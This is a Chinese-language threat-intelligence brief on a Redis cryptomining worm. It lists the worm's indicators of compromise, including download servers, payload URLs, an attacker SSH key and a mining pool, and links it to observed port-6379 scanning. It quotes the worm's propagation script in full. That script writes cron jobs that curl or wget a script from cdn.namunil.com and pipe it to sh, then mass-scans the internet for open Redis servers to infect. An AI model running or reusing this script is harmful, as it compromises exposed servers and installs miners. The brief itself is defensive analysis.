威胁快讯:一个Redis.Miner
IoC
下载服务器
159.89.190.243
img.namunil.com
cdn.namunil.com
下载URL
hxxp://img.namunil.com/ash.php
hxxp://img.namunil.com/bsh.php
hxxp://img.namunil.com/rsh.php
hxxp://cdn.namunil.com/ash.php
hxxp://cdn.namunil.com/bsh.php
hxxp://cdn.namunil.com/ins.php
hxxp://cdn.namunil.com/pgp.php
hxxp://cdn.namunil.com/rsh.php
hxxp://cdn.namunil.com/sh.php
挖矿程序
hxxp://img.namunil.com/dump.db
hxxp://cdn.namunil.com/dump.db
ssh登录私钥
/root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX
规模估计
- 扫描规模:端口6379 ,排名14(24小时内独立来源IP 673个)
- 下载服务器排名还很低,远低于一百万名:
- 0.327100 401126302 2018-03-23 cdn.namunil.com
- 0.572953 174202964 2018-03-23 img.namunil.com
- 挖矿获利:不明,所使用的矿池 z.chakpools.com 并非知名矿池,没有应答
蠕虫式传播
利用 redis 本地漏洞投入载荷,扫描过程中使用的 masscan 是恶意代码自行下载编译的。
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set jmTIabkD "\n*/2 * * * * curl http://cdn.namunil.com/sh.php|sh\n"' >> .dat
echo 'set yCEpdj "\n*/4 * * * * wget -O- http://cdn.namunil.com/sh.php|sh\n"' >> .dat
echo 'set cNaGUd "\n*/5 * * * * /usr/bin/curl -qs http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat
echo 'set mKjzHoR "\n*/10 * * * * /usr/bin/wget -q -O- http://cdn.namunil.com/sh.php|/bin/sh\n"' >> .dat
echo 'config set dir "/var/spool/cron"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
iptables -A INPUT -p tcp --dport 60000 -j DROP
masscan --banners --no-show open --shard 18499/20000 --source-port 60000 --hello-string[6379] "KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo=" --max-rate 10000 -p6379 0.0.0.0/0 --exclude 255.255.255.255 2>/dev/null -oG - | awk '/+OK/ {print $2, $5}' | sort | uniq > .r1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw > /dev/null 2>&1 &
done < .r1
恶意代码与近期 6379 端口扫描之间的同源关系证明
恶意代码中有以下masscan hello-string,并且来源端口限定为 6000:
$echo KjQNCiQ2DQpjb25maWcNCiQzDQpzZXQNCiQzDQpkaXINCiQxNQ0KL3Zhci9zcG9vbC9jcm9uDQo= | base64 -d
*4
$6
config
$3
set
$3
dir
$15
/var/spool/cron
这与我们近期在 6379 上看到的扫描载荷是一致的
2018-03-23 14:23:54 redis sip=111.231.121.59 dip=- sport=60000 dport=65535 proto=tcp tcp.payload=eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg== src=hp
$ fes -X eJzSMuHlUjHj5UrOz0vLTOflUjHm5SpOLYEwUjKLeLlUDE15ufTLEov0iwvy83P0k4vy83i5AAEAAP//WKwNdg==
>>>sha1: 38472e9bfbf6148a9e887ae8196b6b2d2e6005e0 plen:56
*4
$6
config
$3
set
$3
dir
$15
/var/spool/cron